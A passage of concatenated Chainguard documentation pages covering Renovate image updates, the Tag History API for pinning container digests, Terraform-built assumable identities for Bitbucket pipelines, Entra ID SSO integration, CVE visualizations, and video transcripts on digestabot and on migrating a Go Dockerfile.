But an even more secure solution would be to create a script which automatically updates the configuration with the correct values by calling chainctl. If you do this, you should also set the credential lifetime to a much shorter period with the --ttl flag:

```
chainctl auth configure-docker --pull-token --ttl 10m
```

This will set the lifetime to 10 minutes, which limits the risk posed if the token should leak. You can also set the lifetime to a longer period for more manual configurations. Updating Versioned Container Images By default, Renovate will now open PRs for any out-of-date versions of images it finds. For example, you can run Renovate by pushing the following Dockerfile to a repository overseen by Renovate:

```
FROM cgr.dev/chainguard.edu/python:3.11-dev AS builder
...
FROM cgr.dev/chainguard.edu/python:3.11
...
```

At the time of writing, version 3.12 was the current version of the Python image, so the following PR was opened by Renovate: Not all images use semantic versioning. Refer to the Renovate documentation for details on how to support different schemes. Ideally, image references should also be pinned to a digest, as shown in the following section. Updating :latest Container Images Renovate also supports updating image references that are pinned to digests. This allows you to keep floating tags such as :latest in sync with the most up-to-date version. As an example, for the following Dockerfile Renovate opened two similar pull requests:

```
FROM cgr.dev/chainguard/go:latest-dev@sha256:ff187ecd4bb5b45b65d680550eed302545e69ec4ed45f276f385e1b4ff0c6231 AS builder

WORKDIR /work

COPY go.mod /work/
COPY cmd /work/cmd
COPY internal /work/internal

RUN CGO_ENABLED=0 go build -o hello ./cmd/server

FROM cgr.dev/chainguard/static:latest@sha256:5e9c88174a28c259c349f308dd661a6ec61ed5f8c72ecfaefb46cceb811b55a1

COPY --from=builder /work/hello /hello
ENTRYPOINT ["/hello"]
```

The following screenshot shows the PR to update the static image: Troubleshooting Validate Renovate configuration If Renovate isn’t working as expected, try running it in debug mode and/or dumping the resolved configuration. For example: LOG_LEVEL=debug renovate --print-config ...
"hostRules": [ { "hostType": "docker", "matchHost": "cgr.dev", "username": "<Organizations ID>/<pull token ID>", "password": "***********", "resolvedHost": "cgr.dev" }, {"matchHost": null, "hostType": "local"} ] ... DEBUG: hostRules: basic auth for https://cgr.dev (repository=local) DEBUG: getLabels(https://cgr.dev, ORGANIZATION/static, latest) (repository=local) DEBUG: getManifestResponse(https://cgr.dev, ORGANIZATION/static, latest, get) (repository=local) DEBUG: getManifestResponse(https://cgr.dev, ORGANIZATION/static, sha256:76d71eb53b1b44ec955529ece91c6da222a54fed660ca6b25124935bdd96e133, get) (repository=local) DEBUG: found labels in manifest (repository=local) "labels": { "dev.chainguard.package.main": "static", "org.opencontainers.image.authors": "Chainguard Team https://www.chainguard.dev/", "org.opencontainers.image.created": "2024-12-04T19:55:37Z", "org.opencontainers.image.source": "https://github.com/chainguard-images/images-private/tree/main/images/static", "org.opencontainers.image.url": "https://images.chainguard.dev/directory/image/static/overview?utm_source=cg-academy&utm_medium=referral&utm_campaign=dev-enablement&utm_content=edu-content-chainguard-chainguard-images-working-with-images-renovate", "org.opencontainers.image.vendor": "Chainguard" } Connection Errors If you have problems getting Renovate to monitor cgr.dev, please double check the connection details. Make sure the token is still valid (you can verify with chainctl iam identities list) and it has access to the repository you are referring to. You can test these credentials by running a docker login and docker pull in a clean environment. getReleaseList error You may encounter errors such as the following: DEBUG: getReleaseList error (repository=chainguard-images/images-private, branch=renovate/cgr.dev-chainguard.edu-python-3.x) "type": "github", "apiBaseUrl": "https://api.github.com/", "err": { "message": "`chainguard-images` forbids access via a personal access token (classic). Please use a GitHub App, OAuth App, or a personal access token with fine-grained permissions.", "stack": "Error: `chainguard-images` forbids access via a personal access token (classic). Please use a GitHub App, OAuth App, or a personal access token with fine-grained permissions.\n at … These can be safely ignored. They are caused by Renovate using the org.opencontainers.image.source label on our images to look for a changelog. As this source is set to the private images-private GitHub repository, this request fails. --- ### Using the Tag History API URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/using-the-tag-history-api/ Last Modified: June 16, 2025 Tags: Chainguard Containers, Product Chainguard Containers have automated nightly builds, which ensures our container images are always fresh including any recent patches and updated software. Even though it is important to keep your base images always updated, there will be situations where you’ll want to keep using an older build to make sure nothing will change in your container environment until you feel it’s safe to update. For cases like this, it is useful to point your Dockerfile to use a specific container image digest as base image. A container image digest is a unique identifier that is generated for each and every image build. Digests always change, even when the contents of the image remain the same. 
If you have a container environment that was working fine but suddenly breaks with a new build, pinning to a previous build by declaring an image digest instead of a tag is a way to keep things up and running until you’re able to confirm that the new build works as expected with your application. NOTE: If you are looking for a quick way to learn the tag history of a container image, you may want to consider using the chainctl images history command instead of the API. See Examine the History of Container Images for more information. Obtaining a Registry Token Before making API calls, you’ll need to generate a token within Chainguard’s registry. Public Containers The Registry API endpoint for obtaining the token is: https://cgr.dev/token?scope=repository:chainguard/IMAGE_NAME:pull Where IMAGE_NAME is the name of the container image that you want to pull the tag history from. It’s worth noting that the token is only valid for pulling the history of that specific image. For free-tier container images (tagged as latest or latest-dev), you can request a registry token anonymously, without providing any pre-existing auth. The following command will obtain a token for the Python container image and register a variable called auth_header with the resulting value, which you can use in a subsequent command to obtain the tag history:

```
auth_header="Authorization: Bearer $(curl 'https://cgr.dev/token?scope=repository:chainguard/python:pull' \
  | jq -r .token)"
```

Private Containers You’ll need to use your Chainguard Docker credentials. This assumes you’ve set up authentication with chainctl auth configure-docker:

```
auth_header="Authorization: Bearer $(echo 'cgr.dev' | docker-credential-cgr get | jq -r .Secret)"
```

You may use the crane tool to get your token instead:

```
auth_header="$(crane auth token -H cgr.dev/ORGANIZATION_NAME/IMAGE_NAME)"
```

Replace ORGANIZATION_NAME and IMAGE_NAME as required. For example, if your organization is foo.com and you’re interested in the chainguard-base image, you will use the following command:

```
auth_header="$(crane auth token -H cgr.dev/foo.com/chainguard-base)"
```

You should now be ready to call the API, either manually or programmatically. Calling the API Make sure your authorization header is set by running the following command:

```
echo $auth_header
```

You should receive Authorization: Bearer followed by a long string (a JWT) as output. You can now run a curl query to this endpoint, following the below format: https://cgr.dev/v2/ORGANIZATION_NAME/IMAGE_NAME/_chainguard/history/IMAGE_TAG Where: For private images ORGANIZATION_NAME is the name of your organization, for example: foo.com. For public images ORGANIZATION_NAME is always chainguard. IMAGE_NAME is the name of the image, for example: chainguard-base or python. IMAGE_TAG is the tag that you want to pull history from.
For example, this is how you can fetch the tag history of foo.com’s chainguard-base:latest Chainguard image using curl on the command line:

```
curl -H "$auth_header" \
  https://cgr.dev/v2/foo.com/chainguard-base/_chainguard/history/latest | jq
```

Or for a free-tier container image such as python:latest:

```
curl -H "$auth_header" \
  https://cgr.dev/v2/chainguard/python/_chainguard/history/latest | jq
```

You should get output like the following:

```
{
  "history": [
    {
      "updateTimestamp": "2023-05-12T13:46:10.555Z",
      "digest": "sha256:81c334de6dd4583897f9e8d0691cbb75ad41613474360740824d8a7fa6a8fecb"
    },
    {
      "updateTimestamp": "2023-05-12T20:50:19.702Z",
      "digest": "sha256:a8724b7a80cae14263a3b55f7acb5d195fcbb24afbc8067aa5198aa2a9131cde"
    },
    ...
  ]
}
```

Using the start and end parameters In some cases it may be helpful to specify digests created in a given time period rather than querying the entire history of a tag. For this, you can use the start and end parameters. These optional parameters can be added to requests to the Tag History API and should be specified in the ISO 8601 format. To illustrate how to query digests of a container image created in the last week, first create a local shell variable named timestamp. On Ubuntu, you would create the timestamp variable as follows:

```
timestamp=$(date -d "-1 week" +%Y-%m-%dT%H:%M:%SZ)
```

And on Wolfi, you would create it like this:

```
timestamp=$(date -d @$(( $(date +%s ) - 604800 )) +%Y-%m-%dT%H:%M:%SZ)
```

Then to query digests of the python:latest Chainguard Container created in the last week you would run a command like the following:

```
curl -s -H "$auth_header" \
  "https://cgr.dev/v2/chainguard/python/_chainguard/history/latest?start=${timestamp}" | jq
```

To query digests of the python:latest Chainguard Container created before 2024, first create a new timestamp variable like this:

```
timestamp="2024-01-01T00:00:00Z"
```

Then run the query like this:

```
curl -s -H "$auth_header" \
  "https://cgr.dev/v2/chainguard/python/_chainguard/history/latest?end=${timestamp}" | jq
```

Both of these examples filter the curl command’s output through jq, a useful tool for processing JSON on the command line. Page limit Please note that the Tag History API will return a maximum of 1000 records on a single request. For tags with many digests, since the oldest digests are ordered first, it may be necessary to specify the timestamp of the desired digests; for this, the start and end parameters may be used as specified above. Using Container Digests within a Dockerfile Setting up your Dockerfile to use an older build is a matter of modifying your FROM line to use a container image digest instead of a tag. For instance, let’s say you want to keep using a specific build of the Python image. In a previous section of this page we obtained the tag history of the Python image; for this example, we’ll pin to the build digest listed as sha256:81c334de6dd4583897f9e8d0691cbb75ad41613474360740824d8a7fa6a8fecb. With that information, you can edit your Dockerfile and replace:

```
FROM cgr.dev/chainguard/python:latest
```

With:

```
FROM cgr.dev/chainguard/python@sha256:81c334de6dd4583897f9e8d0691cbb75ad41613474360740824d8a7fa6a8fecb
```

And your container image will then be locked into that specific build of the python:latest image variant.
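As a small sketch of how you might automate this, the following commands reuse the auth_header variable set earlier to fetch the newest digest for python:latest and print a pinned FROM line. Since the Tag History API returns the oldest digests first, the last entry of the response is the most recent; for tags with very long histories you would combine this with the start parameter described above rather than relying on a single request:

```
# Fetch the tag history and extract the most recent digest (last entry)
digest=$(curl -s -H "$auth_header" \
  "https://cgr.dev/v2/chainguard/python/_chainguard/history/latest" \
  | jq -r '.history[-1].digest')

# Print a pinned FROM line you can paste into a Dockerfile
echo "FROM cgr.dev/chainguard/python@${digest}"
```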
--- ### Create an Assumable Identity for a Bitbucket Pipeline URL: https://edu.chainguard.dev/chainguard/administration/assumable-ids/identity-examples/bitbucket-identity/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product, Procedural Chainguard’s assumable identities are identities that can be assumed by external applications or workflows in order to perform certain tasks that would otherwise have to be done by a human. This procedural tutorial outlines how to create an identity using Terraform, and then how to update a Bitbucket pipeline so that it can assume the identity and interact with Chainguard resources. Prerequisites To complete this guide, you will need the following. terraform installed on your local machine. Terraform is an open-source Infrastructure as Code tool which this guide will use to create various cloud resources. Follow the official Terraform documentation for instructions on installing the tool. chainctl — the Chainguard command line interface tool — installed on your local machine. Follow our guide on How to Install chainctl to set this up. A Bitbucket pipeline you can use to test out the identity you’ll create. We recommend following Bitbucket’s Getting Started guide to set this up. If you need to enable pipelines for your repository, visit Bitbucket’s Configure your first pipeline page to get started. Creating Terraform Files We will be using Terraform to create an identity for a Bitbucket pipeline to assume. This step outlines how to create three Terraform configuration files that, together, will produce such an identity. To help explain each configuration file’s purpose, we will go over what they do and how to create each file one by one. First, though, create a directory to hold the Terraform configuration and navigate into it. mkdir ~/bitbucket-id && cd $_ This will help make it easier to clean up your system at the end of this guide. main.tf The first file, which we will call main.tf, will serve as the scaffolding for our Terraform infrastructure. The file will consist of the following content. terraform { required_providers { chainguard = { source = "chainguard-dev/chainguard" } } } This is a fairly barebones Terraform configuration file, but we will define the rest of the resources in the other two files. In main.tf, we declare and initialize the Chainguard Terraform provider. Next, you can create the sample.tf file. sample.tf sample.tf will create a couple of structures that will help us test out the identity with a Bitbucket workflow. This Terraform configuration consists of two main parts. The first part of the file will contain the following lines. data "chainguard_group" "group" { name = "my-customer.biz" } This section looks up a Chainguard IAM organization named my-customer.biz. This will contain the identity — which will be created by the bitbucket.tf file — to access when we test it out later on. Now you can move on to creating the last of our Terraform configuration files, bitbucket.tf. bitbucket.tf The bitbucket.tf file is what will actually create the identity for your Bitbucket workflow to assume. The file will consist of four sections, which we’ll go over one by one. The first section creates the identity itself. resource "chainguard_identity" "bitbucket" { parent_id = data.chainguard_group.group.id name = "bitbucket" description = <<EOF This is an identity that authorizes Bitbucket workflows for this repository to assume to interact with chainctl.
EOF claim_match { audience = "ari:cloud:bitbucket::workspace/%workspace-uuid%" issuer = "https://api.bitbucket.org/2.0/workspaces/%workspace-name%/pipelines-config/identity/oidc" subject_pattern = "{%repository-uuid%}:.+" } } First, this section creates a Chainguard Identity tied to the chainguard_group looked up in the sample.tf file. The identity is named bitbucket and has a brief description. The most important part of this section is the claim_match. When the Bitbucket pipeline tries to assume this identity later on, it must present a token matching the audience, issuer, and subject specified here in order to do so. The audience is the intended recipient of the issued token, while the issuer is the entity that creates the token. Finally, the subject_pattern is the entity (here, the Bitbucket pipeline build) that the token represents. Note that the curly braces around the %repository-uuid% variable are part of the generated OIDC token from Bitbucket, so be sure to include both opening { and closing } characters around your repository UUID. In this case, the issuer field points to https://api.bitbucket.org/2.0/workspaces/%workspace-name%/pipelines-config/identity/oidc, the issuer of JWT tokens for Bitbucket pipelines. Instead of pointing to a literal value with a subject field, though, this file points to a regular expression using the subject_pattern field. When you run a Bitbucket pipeline, it generates a unique identifier for each pipeline step and appends it to the token’s subject. Since the identifier is not known ahead of time, passing the regular expression .+ allows you to specify a subject regex that will work for every build from this pipeline. Refer to your Bitbucket repository OIDC settings page for reference values. To find the page, browse to your Repository settings page, and then find the OpenID Connect section in the left menu. For the purposes of this guide, you will need to replace %workspace-name%, %workspace-uuid%, and %repository-uuid% with the values from your Bitbucket OIDC settings page. The next section will output the new identity’s id value. This is a unique value that represents the identity itself. output "bitbucket-identity" { value = chainguard_identity.bitbucket.id } The section after that looks up the viewer role. data "chainguard_role" "viewer" { name = "viewer" } The final section grants this role to the identity. resource "chainguard_rolebinding" "view-stuff" { identity = chainguard_identity.bitbucket.id group = data.chainguard_group.group.id role = data.chainguard_role.viewer.items[0].id } When creating this file with each of these sections, be sure to change the subject_pattern value to align with your own Bitbucket pipeline OIDC variables. For example, if your repository UUID were C668DE74-6D94-4924-90B1-8B9AB7EE9089, you would set the subject_pattern value to "{C668DE74-6D94-4924-90B1-8B9AB7EE9089}:.+", ensuring that the curly braces are included. Following that, your Terraform configuration will be ready. Now you can run a few terraform commands to create the resources defined in your .tf files. Creating Your Resources First, run terraform init to initialize Terraform’s working directory. terraform init Then run terraform plan. This will produce a speculative execution plan that outlines what steps Terraform will take to create the resources defined in the files you set up in the last section.
terraform plan If the plan worked successfully and you’re satisfied that it will produce the resources you expect, you can apply it. terraform apply Before going through with applying the Terraform configuration, this command will prompt you to confirm that you want it to do so. Enter yes to apply the configuration. . . . Plan: 4 to add, 0 to change, 0 to destroy. Changes to Outputs: + bitbucket-identity = (known after apply) Do you want to perform these actions? Terraform will perform the actions described above. Only 'yes' will be accepted to approve. Enter a value: After pressing ENTER, the command will complete and will output a bitbucket-identity value. Note that you may receive a PermissionDenied error part way through the apply step. If so, run chainctl auth login once more, and then terraform apply again to resume creating the identity and resources. . . . Apply complete! Resources: 3 added, 0 changed, 0 destroyed. Outputs: bitbucket-identity = "%bitbucket-identity%" This is the identity’s UIDP (unique identity path), which you configured the bitbucket.tf file to emit in the previous section. Note this value down, as you’ll need it when you test this identity using a Bitbucket workflow. If you need to retrieve this UIDP later on, though, you can always run the following chainctl command to obtain a list of the UIDPs of all your existing identities. chainctl iam identities ls You’re now ready to edit a Bitbucket pipeline in order to test out this identity. Testing the identity with a Bitbucket pipeline To test the identity you created with Terraform in the previous section, ensure you have Pipelines enabled for your repository and then create a bitbucket-pipelines.yml file in the root of your repository. Note that if you already have a pipeline with steps defined then you only need to add the oidc: true field to your pipeline to enable OIDC for the step in question. Copy the following pipeline definition into your bitbucket-pipelines.yml file and commit it to the repository. image: atlassian/default-image:3 pipelines: default: - step: oidc: true max-time: 5 script: - curl -o chainctl "https://dl.enforce.dev/chainctl/latest/chainctl_$(uname -s | tr '[:upper:]' '[:lower:]')_$(uname -m)" - chmod +x chainctl # Assume the bitbucket pipeline identity - ./chainctl auth login --identity-token $BITBUCKET_STEP_OIDC_TOKEN --identity %bitbucket-identity% - ./chainctl auth configure-docker --identity-token $BITBUCKET_STEP_OIDC_TOKEN --identity %bitbucket-identity% The important line is the oidc: true option, which enables OIDC for the individual step in the pipeline. This configuration is why the subject_pattern with a regular expression is used in the Terraform configuration, since each step gets its own UUID identifier, which is added to the sub field in the generated OIDC token. Since the step UUID is not known before the build, the subject match needs to use a regular expression. Now you can add commands for testing the identity, like chainctl images repos list in the following example: ... # Assume the bitbucket pipeline identity - ./chainctl auth login --identity-token $BITBUCKET_STEP_OIDC_TOKEN --identity %bitbucket-identity% - ./chainctl images repos list - docker pull cgr.dev/<organization>/<repo>:<tag> Once you commit the bitbucket-pipelines.yml file, the pipeline will run. Assuming everything works as expected, your pipeline will be able to assume the identity and run the chainctl images repos list command, listing repos available to the organization. . . .
chainctl 100%[===================>] 54.34M 6.78MB/s in 13s 2023-05-17 13:19:45 (4.28 MB/s) - ‘chainctl’ saved [56983552/56983552] Successfully exchanged token. Valid! Id: 3f4ad8a9d5e63be71d631a359ba0a91dcade94ab/d3ed9c70b538a796 If you’d like to experiment further with this identity and what the pipeline can do with it, there are a few parts of this setup that you can tweak. For instance, if you’d like to give this identity different permissions you can change the role data source to the role you would like to grant. data "chainguard_role" "editor" { name = "editor" } You can also edit the pipeline itself to change its behavior. For example, instead of listing the repos the identity has access to, you could have the workflow inspect the organizations. - ./chainctl iam organizations ls Of course, the Bitbucket pipeline will only be able to perform certain actions on certain resources, depending on what kind of access you grant it. Removing Sample Resources To remove the resources Terraform created, you can run the terraform destroy command. terraform destroy This will destroy the role-binding and the identity created in this guide. It will not delete the organization. You can then remove the working directory to clean up your system. rm -r ~/bitbucket-id/ Following that, all of the example resources created in this guide will be removed from your system. Learn more For more information about how assumable identities work in Chainguard, check out our conceptual overview of assumable identities. Additionally, the Terraform documentation includes a section on recommended best practices which you can refer to if you’d like to build on this Terraform configuration for a production environment. Likewise, for more information on using Bitbucket pipelines, we encourage you to check out the official project documentation, particularly their documentation on OIDC. --- ### How To Integrate Microsoft Entra ID SSO with Chainguard URL: https://edu.chainguard.dev/chainguard/administration/custom-idps/idp-providers/ms-entra-id/ Last Modified: October 28, 2024 Tags: Chainguard Containers, Procedural The Chainguard platform supports single sign-on (SSO) authentication for users. By default, users can log in with GitHub, GitLab and Google, but SSO support allows users to bring their own identity provider for authentication. This guide outlines how to create a Microsoft Entra ID (formerly Azure Active Directory) application and integrate it with Chainguard. After completing this guide, you’ll be able to log in to Chainguard using Entra ID and will no longer be limited to the default SSO options. Prerequisites To complete this guide, you will need the following. chainctl installed on your system. Follow our guide on How To Install chainctl if you don’t already have this installed. An Azure account with Admin permissions you can use to set up a Microsoft Entra ID application. NOTE: Without Admin permissions on your Azure account, you will not be able to assign users to the created Entra ID Application. Create a Microsoft Entra ID Application To integrate Microsoft Entra ID with the Chainguard platform, log in to Azure. In the left-hand navigation menu, select Microsoft Entra ID. From the Default Directory Overview page, click the ➕ Add button and select App Registration from the dropdown menu. In the Register an application screen, configure the application as follows. Name: Set the name to “Chainguard” (or similar) to ensure users recognize this application is for authentication to the Chainguard platform.
Supported account types: Select the Single tenant option so that only your organization can use this application to authenticate to Chainguard. Redirect URI: Set the platform to Web and the redirect URI to https://issuer.enforce.dev/oauth/callback. Save your configuration by clicking the Register button. Next, you can optionally set additional branding for the application by selecting Branding and properties from the Manage dropdown menu. Here you can set additional metadata for the application, including a Chainguard logo icon to help your users visually identify this integration. If you’d like, you can use the icon from the Chainguard Console. The console homepage is console.chainguard.dev, and our terms of service and privacy notice can be found at chainguard.dev/terms-of-service and chainguard.dev/privacy-notice, respectively. Finally, navigate to the Certificates & secrets tab in the Manage dropdown to create a client secret to authenticate the Chainguard platform to Microsoft Entra ID. Select New client secret to add a client secret. In the resulting modal window, add a description and set an expiration date. Finally, take note of the client secret “Value” that is created. You’ll need this to configure the Chainguard platform to use this Microsoft Entra ID application. Configuring Chainguard to use Microsoft Entra ID Now that your Microsoft Entra ID application is ready, you can create the custom identity provider. First, log in to Chainguard with chainctl, using an OIDC provider like Google, GitHub, or GitLab to bootstrap your account. chainctl auth login Note that this bootstrap account can be used as a backup account (that is, an account you can use to log in if you ever lose access to your primary account). However, if you prefer to remove this role-binding after configuring the custom IDP, you may also do so. To configure Chainguard, make a note of the following details from your Microsoft Entra ID application: Application (client) ID: This can be found on the Overview tab of the Chainguard application. Client Secret: You noted this down when you set up the client secret in the previous step. Directory (tenant) ID: This can also be found on the Overview tab of the Chainguard application. You will also need the UIDP for the Chainguard organization under which you want to install the identity provider. Your selection won’t affect how your users authenticate but will have implications for who has permission to modify the SSO configuration. You can retrieve a list of all the Chainguard organizations you belong to — along with their UIDPs — with the following command. chainctl iam organizations ls -o table ID | NAME | DESCRIPTION --------------------------------------------------------+-------------+--------------------- 59156e77fb23e1e5ebcb1bd9c5edae471dd85c43 | sample_org | . . . | . . . | Note down the ID value for your chosen organization. With this information in hand, create a new identity provider with the following commands.
export NAME=entra-id export CLIENT_ID=<your application/client id here> export CLIENT_SECRET=<your client secret here> export ORG=<your organization UIDP here> export TENANT_ID=<your directory/tenant id here> export ISSUER="https://login.microsoftonline.com/${TENANT_ID}/v2.0" chainctl iam identity-provider create \ --configuration-type=OIDC \ --oidc-client-id=${CLIENT_ID} \ --oidc-client-secret=${CLIENT_SECRET} \ --oidc-issuer=${ISSUER} \ --oidc-additional-scopes=email \ --oidc-additional-scopes=profile \ --parent=${ORG} \ --default-role=viewer \ --name=${NAME} Note the --default-role option. This defines the default role granted to users registering with this identity provider. This example specifies the viewer role, but depending on your needs you might choose editor or owner. If you don’t include this option, you’ll be prompted to specify the role interactively. For more information, refer to the IAM and Security section of our Introduction to Custom Identity Providers in Chainguard tutorial. You can refer to our Generic Integration Guide in our Introduction to Custom Identity Providers doc for more information about the chainctl iam identity-provider create command and its required options. To log in to the Chainguard Console with the new identity provider you just created, navigate to console.chainguard.dev and click Use Your Identity Provider. Next, click Use Your Organization Name and enter the name of the organization associated with the new identity provider. Finally, click the Login with Provider button. This will open up a new window with the Microsoft Entra ID login flow, allowing you to complete the login process there. You can also use the custom identity provider to log in through chainctl. To do this, run the chainctl auth login command and add the --identity-provider option followed by the identity provider’s ID value: chainctl auth login --identity-provider <IDP-ID> The ID value appears in the ID column of the table returned by the chainctl iam identity-provider create command you ran previously. You can also retrieve this table at any time by running chainctl iam identity-provider ls -o table when logged in. --- ### Using CVE Visualizations URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/cve_visualizations/ Last Modified: March 21, 2025 Tags: Chainguard Containers, Product Chainguard provides CVE Visualizations for all of its container images. This feature creates reports with CVE comparisons between Chainguard Containers and popular alternatives, as well as historical CVE remediation metrics. CVE Visualizations provide insight into image health and can help teams measure the engineering, security, and economic benefits gained from using Chainguard Containers. This guide outlines how you can access a container image’s CVE Visualization in both the Chainguard Console and in the Containers Directory. Accessing CVE Visualizations in the Console You can find CVE Visualizations and reports in two separate places in the Chainguard Console: in the Reports section of the left-hand navigation menu and in the Comparison tab of an individual Container’s overview. Reports section Visualizations can be found under the Reports section in the left-hand navigation bar. The Reports page will look similar to the following. At the top of the Reports page will be two tabs: Compare Containers and Historical CVEs. Let’s first review the Compare Containers tab.
At the top left of the Compare Containers tab is a drop-down menu which you can use to select the Chainguard Container you want to compare. The contents of this menu are organized in alphabetical order, starting with Organization Containers at the top (if your selected organization has access to specific Chainguard Containers) followed by free-tier Chainguard Containers. After you select a container image, a second drop-down will appear. This will be populated with data on “alternative” images which (if available) you can compare against the selected Chainguard Container. In some cases there will be more than one alternative available, in which case you can select between them using the drop-down. To the right of the alternatives menu you can select a time range for the report. Below the controls, you will find several boxes with statistics and graphs: An overview section showing the current and average CVE counts as well as container image size for the images. A CVEs by Severity section with bar graphs showing the CVE count per day for both images, broken down by severity. Note that this section also includes an Export button you can use to download this data as a JSON file. A Total CVEs Over Time section showing a line graph with the total number of CVEs for any given day for each container image. This provides a visual comparison of the difference in CVE count between the images. A Cumulative CVEs Identified section, with a line graph showing the total number of newly identified CVEs since the beginning of the time range selected, for each image. This provides a visual comparison of the CVE accumulation rate between the images. The Historical CVEs tab shows data relating to CVEs that have appeared over the past three months in container images that your organization has access to. Be aware that the totals shown only represent your Organization Containers, and not free-tier images. Note: If you are a member of more than one organization, you can switch to another organization by clicking the drop-down menu in the top left corner of the Console. The Historical CVEs tab has two boxes. The first box is labeled Resolved CVEs in Organization Containers and shows a bar chart displaying the number of resolved CVEs by date over the last three months. The second box is labeled Total Resolved CVEs by Severity and shows a horizontal bar chart of all the resolved CVEs from the past three months. In both graphs, the CVEs are color-coded by severity. Comparison tab You can find this same comparison data when navigating to a specific container image in either the Browse Containers section or in your Organization Containers. After navigating to either of these sections, click on or search for any image you like. By default, you will be taken to the container image’s Versions tab. Click on the Comparison tab at the far right. There, you’ll be presented with the same comparison information found in the Reports section. At the top are some control menus, allowing you to select the date range for the comparison and, if available, the alternative you’d like to compare the Chainguard Container against. This example shows the PHP container image. Accessing CVE Visualizations in the Containers Directory Similar to the CVE reports found in the Browse Containers and Organization Containers section of the Chainguard Console, you can find CVE reports for every one of Chainguard’s container images in the Containers Directory.
After navigating to the directory, click on or search for any container image you like. Again, you will be taken to the image’s Versions tab by default. Click on the Comparison tab at the right to view the CVE Comparison data. This example shows the nginx image. Limitations Some container images do not currently have a comparative alternative. In these cases, the Comparison report will only show data for the Chainguard Container. Learn More The CVE data used in these reports is from the Grype vulnerability scanner. Vulnerability data is constantly evolving, so we scan container images each day and store the results. The results shown are the vulnerabilities found on the day in question; scanning the container images again with a newer database will show different results. For more information on CVEs, see What Are Software Vulnerabilities and CVEs. You may also find our guide on Using the Chainguard Directory and Console to be of interest. --- ### Keep your Chainguard Containers Up to Date with digestabot URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/updating-images/digestabot/ Last Modified: December 12, 2024 Tools used in this video digestabot Transcript Today, I’d like to talk about a common question I get asked. How can you keep images up to date while avoiding breaking changes? The basic issue is that we’d like to make sure we’re getting the latest security updates and features for our software. But we really don’t want our applications and infrastructure to break unexpectedly. So there’s a tension between updating all the time, which gives you the latest code, and limiting unexpected breakages. In this example, we have a multi-stage Python build using Chainguard Containers which are pinned to a digest. Now, digests are content-based hashes of images. So if you reference an image by digest, you will always get exactly the same image every time. Now, this is fantastic for reproducibility, as I know that if anybody uses this Dockerfile, they will get exactly the same images that I was using. And this is especially important in Python, where if the version changes, so we go from Python 3.12 to Python 3.13, you might find that various libraries don’t work until they’re updated. Now, how do you do updates then? Well, you could manually go in and bump this digest yourself. But we’ve got a better solution for you that I want to talk about briefly today, and it’s called Digestabot. Digestabot is a GitHub action that can be set to run on a cron job and will open a PR when it detects there’s a newer version of the image available. You can then test the image to make sure it works with your application before merging the PR. So for my example, it would check the Chainguard registry for the current digest of the latest tag and open a PR if it doesn’t match the digest in the file. We use Digestabot internally at Chainguard, and this pattern nicely balances the tension between keeping images up to date and vulnerability-free with the need to test and verify changes before shipping to production. So please try it out and let me know if you have any questions.
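To make the idea concrete, here is a minimal sketch of the check that digestabot automates for you, assuming you have the crane tool (from go-containerregistry) installed; the pinned digest below is a placeholder rather than a real value.

```sh
# Digest currently pinned in your Dockerfile (placeholder value).
pinned="sha256:0000000000000000000000000000000000000000000000000000000000000000"

# Ask the registry which digest the latest tag currently resolves to.
current=$(crane digest cgr.dev/chainguard/python:latest)

# digestabot runs a comparison like this on a schedule and opens a PR when the values differ.
if [ "$pinned" != "$current" ]; then
  echo "latest now resolves to $current; update the pinned digest in your Dockerfile"
fi
```

In practice you would let the digestabot GitHub Action run this check on a cron schedule and open the pull request for you, rather than comparing digests by hand.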
Relevant Resources Reproducible Dockerfiles with Frizbee and Digestabot (Video) Reproducibility and Chainguard Containers (Video) Considerations for Keeping Containers Up to Date (Article) Strategies and Tooling for Updating Containers (Article) --- ### Migrating a Dockerfile for a Go application to use Chainguard Containers URL: https://edu.chainguard.dev/chainguard/migration/migration-guides/migrating_go/ Last Modified: December 12, 2024 Tools used in this video Docker Transcript In this video, I’m going to show how easy it is to port an existing Dockerfile to use a Chainguard Containers base, and how that can help to improve the image, especially in terms of security. I’ll be using the free tier of Chainguard Containers here, so you can do everything in this video on your own projects today. The example I’m going to use is porting an existing Golang project to use the Chainguard Go and Static images, but a very similar technique can be used for other compiled languages, such as Rust and C, especially where you can produce a statically linked executable. Okay, so over to the terminal. Okay, so I have this simple Go project. We can take a look at the main part of the code. It’s extremely simple. All we’re doing is creating a web server that listens on port 8080 and responds with the text: “Hello world.” We also have a Dockerfile to build our application. It’s extremely simple as well. We’re using the Docker Hub Golang image, copying over the source, and running Go build. So let’s try building that. I’ve built it before, so that ran really fast. We can try running it. I should be able to access it. Okay, so that all works. It’s a really nice, simple Go web server. Let’s take a look at how we can change it to use a Chainguard Container. The easiest thing we can do, literally a one-line change, is just to modify this to point at the Chainguard Go image. With any luck, that will build just the same. So I’ll go back to this original build statement. We’ll call it something different so we can compare it later. Okay, that’s built. Now we want to check it runs. I do need to first stop the old one. Okay, let’s try running it again. It’s running. Let’s check it works. Okay, so that works identically. A one-line change, and we’ve made no difference to the actual running application. But let’s investigate this a little bit more. So if I do docker images on go-web-app, well this is a pretty large image at 892 megabytes. If I run it on our new image, it’s 775 megabytes. So that’s about a 120-megabyte saving, but still quite a large image. More interestingly, if I try Docker Scout Quick View to take a look at the CVEs, if I run it on Go web app, we can see there’s 42 low vulnerabilities in there. So there’s quite a bit going on in there. We can also see there’s 303 packages. So there’s a lot of stuff in this image. Let’s compare it to the Chainguard Container. There’s no CVEs and there’s only 85 packages. So this one change has really improved the security posture by getting rid of these 42 low CVEs. But there’s a lot more we can do. Let’s take a look at the Dockerfile again. So we’re using this Chainguard Go image, but we don’t need everything in this image when we’re actually running the image. We just need the Go compiler, for instance, to build the server, but we don’t need the Go compiler in the final image. So what we can do is create a multi-stage build. And I’m going to use the Chainguard static image to house the final production application. So the static image is really simple.
